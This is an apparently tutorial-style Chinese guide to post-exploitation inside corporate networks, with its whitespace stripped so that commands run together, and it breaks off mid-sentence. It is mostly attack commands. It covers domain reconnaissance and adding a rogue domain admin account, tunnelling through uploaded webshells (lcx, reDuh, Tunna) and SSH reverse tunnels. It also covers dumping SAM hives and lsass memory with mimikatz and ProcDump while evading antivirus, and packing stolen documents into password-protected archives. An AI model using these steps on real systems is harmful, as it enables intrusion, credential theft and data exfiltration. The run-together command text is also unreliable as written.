内网渗透(红客学院)

内网渗透目录1.信息收集2.端口转发&&边界处理3.hash、密码抓取与嗅探4.文件的传输5.权限维持6.痕迹清理前言内网渗透的目的？在我们进入目标网络后，通过对目标内网的渗透，拿到全部或部分重要个人、服务器的控制权限，以满足查找并下载内网重要数据的要求。信息收集信息收集1.本地信息收集[+]------用户列表[Windows用户列表/邮件用户/...]----分析Windows用户列表----分析邮件用户，内网[域]邮件用户，通常就是内网[域]用户[+]------进程列表----分析杀毒软件/安全监控工具等----邮件客户端----VPN等[+]------服务列表----与安全防范工具有关服务[判断是否可以手动开关等]----存在问题的服务[权限/漏洞][+]------端口列表----开放端口对应的常见服务/应用程序[匿名/权限/漏洞等]----利用端口进行信息收集，建议大家深入挖掘[NETBIOS,SMB等]信息收集[+]------补丁列表----分析Windows补丁----第三方软件[Java/Oracle/Flash等]漏洞[+]------本机共享----本机共享列表/访问权限----本机访问的域共享/访问权限[+]------本地用户习惯分析----历史记录----收藏夹----文档等信息收集ipconfig/all----查询本机IP段，所在域等netlocalgroupadministrators----本机管理员netgroup“domainadmins”/domain-----查询域管用户netlocalgroupadministrators/domain-----已加入域本地管理员netgroupdomaincontrollers/domain-----查看域控制器netconfigworkstation-----当前登录域queryuser/qwinsta-----当前登录用户netsession------查看当前会话netview-----查询域内共享netview/domain------查询域列表netstart-----查看当前运行的服务netaccounts/domain------查看域密码策略dsquery/dsget------获取域内信息nltest/domain_trusts-----获取域信任列表信息收集1、获取当前组的计算机名(一般remark有Dc可能是域控)：信息收集2、查看所有域信息收集3、查看域中的用户名信息收集4、查询域组名称信息收集5、查询域管理员信息收集6、添加域管理员账号•添加普通域用户•netuserlemoniam@L3m0n/add/domain•将普通域用户提升为域管理员•netgroupDomainAdminslemon/add/domain信息收集7、查看当前计算机名，全名，用户名，系统版本，工作站域，登陆域信息收集8、查看域控制器(多域控制器的时候,而且只能用在域控制器上)•netgroupDomaincontrollers“9、查询所有计算机名称•dsquerycomputer•下面这条查询的时候,域控不会列出•netgroupDomainComputers/domain信息收集10、net命令1、映射磁盘到本地netusez:\\dc01\sysvol2、查看共享netview\\192.168.0.13、开启一个共享名为app$，在d:\confignetshareapp$=d:\config11、跟踪路由Tracert8.8.8.8信息收集信息收集信息收集信息收集1、nbtscan获取mac地址：•Nbtstat-A192.168.1.992、获取计算机名\分析dc\是否开放共享•Nbtscan10.10.24.1/24信息收集WinScanX需要登录账号能够获取目标很详细的内容。其中还有snmp获取,windows密码猜解(但是容易被杀,nishang中也实现出一个类似的信息获取/Gather/Get-Information.ps1)•WinScanX.exe-3DC1centoso\pentestpassword-atest.txt端口转发&&边界处理端口转发&&边界处理为什么要进行端口转发？渗透过程中，当获取到一个webshell的时候，发现外网ip无法链接，但3389开放，那很有可能是内网服务器，下面将介绍几款有关内网转发的工具。端口转发&&边界处理拓扑图端口转发&&边界处理1、Lcx.exe工具使用首先远程目标系统要开启远程访问功能（若未开可通过开3389命令开启）.lcx.exe是个端口转发工具，相当于把肉鸡A上的3389端口转发到B机上，当然这个B机必须有外网IP。这样链接B机的3389端口就相当于链接A机的3389。首先在本地进行监听，监听51端口并转发到33891端口本机运行：shell里运行:端口转发&&边界处理2、Reduh内网反弹java-jarreDuhClient.jar[createTunnel]1235:127.0.0.1:3389端口转发&&边界处理（3)、Tunna内网反弹|ClientApp|--|LocalProxy|==|Firewall|==|Webshell|+--|ServerApp|该工具先使用proxy.py监听本地一个端口,然后连接部署在远程WEB的webshell,远端的webshell会把端口转发请求转发到本地或者本地内网远程的主机,从而实现HTTPtunneling.这对于内网入侵来说,是很有用的一个工具.该工具其实和reduh原理是一样的,不过tunna更稳定,速度更快.端口转发&&边界处理实例:网站对外只开放了80端口,其他的端口都是关闭的,通过CVE-2013-225得到JSP的WEBSHELL后,上传conn.jsp,做转发,实现连接本机的其他端口.直接扫描发现3389是关闭的端口转发&&边界处理（1）.通过webshell上传conn.jsp到主机上,本地开始连接（2）.pythonproxy.py-u表示本地监听的端口-r远程要转发的端口-v详细模式（3）.本地连接rdesktop127.0.0.1:1234端口转发&&边界处理（4）.对于有些服务,比如SSH,还需要添加-s参数,才能保证连接的时候不会中断pythonproxy.py-u端口转发&&边界处理4.SSH通道本地访问127.0.0.1:port1就是host:port2(用的更多)ssh-CfNg-Lport1:127.0.0.1:port2user@host#本地转发访问host:port2就是访问127.0.0.1:port1ssh-CfNg-Rport2:127.0.0.1:port1user@host#远程转发可以将dmz_host的hostport端口通过remote_ip转发到本地的port端口ssh-qTfnN-Lport:dmz_host:hostport-luserremote_ip#正向隧道监听本地port可以将dmz_host的hostport端口转发到remote_ip的port端口ssh-qTfnN-Rport:dmz_host:hostport-luserremote_ip#反向隧道，穿透防火墙端口转发&&边界处理5.利用iptables编辑配置文件/etc/sysctl.conf的net.ipv4.ip_forward=1关闭服务•serviceiptablesstop配置规则•需要访问的内网地址：192.168.206.101•内网边界web服务器：192.168.206.129•iptables-tnat-APREROUTING--dst192.168.206.129-ptcp--dport3389-jDNAT--to-destination192.168.206.101:3389•iptables-tnat-APOSTROUTING--dst192.168.206.101-ptcp--dport3389-jSNAT--to-source192.168.206.129保存&&重启服务•serviceiptablessave&&serviceiptablesstart端口转发&&边界处理6、socket代理推荐使用xsocks进行代理进入代理后，Windows下推荐使用Proxifier进行socket连接，规则自行设置端口转发&&边界处理linux进行代理后，推荐使用proxychains进行socket连接。kali下的配置文件：/etc/proxychains.conf添加一条：socks5127.0.0.18888然后在命令前加proxychains就进行了代理hash、密码抓取与嗅探hash、密码抓取与嗅探Hash简介hash、密码抓取与嗅探本机hash+明文抓取1、Get-PassHashes.ps1hash、密码抓取与嗅探2、导注册表+本地分析Win2000和XP需要先提到SYSTEM，03开始直接可以regsave导出的文件大,效率低,但是安全•regsavehklm\samsam.hive•regsavehklm\systemsystem.hive•regsavehklm\securitysecurity.hivehash、密码抓取与嗅探3、QuarkPwDump、getpass等本地账户明文抓取(闪电小子根据mimikatz写的一个内存获取明文)QuarkPwDumpQuarkPwDump.exe-dhl-oc:\1.txthash、密码抓取与嗅探getpasshash、密码抓取与嗅探4.Mimikatz(1)、本机测试直接获取内存中的明文密码privilege::debugsekurlsa::logonpasswordshash、密码抓取与嗅探(2)、非交互式抓明文密码(webshell中)mimikatz.exeprivilege::debugsekurlsa::logonpasswordspssword.txt(3)、ProcDump+Mimikatz远程：Procdump.exe-accepteula-malsass.exelsass.dmp本地：sekurlsa::minidumplsass.dump.dmpsekurlsa::logonpasswordsfullhash、密码抓取与嗅探(4)、需要注意的点:1).ProcDump+Mimikatz本地分析文件会比较大，低效，但是安全(绕过杀软)2).mimikatz的平台（platform）要与进行dump的系统(sourcedump)兼容hash、密码抓取与嗅探ARP欺骗嗅探以cain为例，仅作为了解文件的传输文件的传输数据压缩1、Rar（加密文件名）命令:rar.exea–r–v100mnew.rar–ta20130101000000–hpPass–n*.doc–x*.exed:\data\注：压缩d:\data\目录下所有2013-01-01后修改的doc文件，100M/包密码为Pass,-x为排除选项文件的传输2、7z（加密文件名）7z.exeac:\xx.7z-pPass-mhed:\data-v10m压缩d:\data下所有文件，密码为Pass，分卷10M/包3、AlZip（未加密文件名）ALZipCon.exe-ad:\datac:\e1.egg–v10mb-pPass-tp24、linux下，命令打包tar-czfweb.tar.gz./*文件的传输数据传输1、F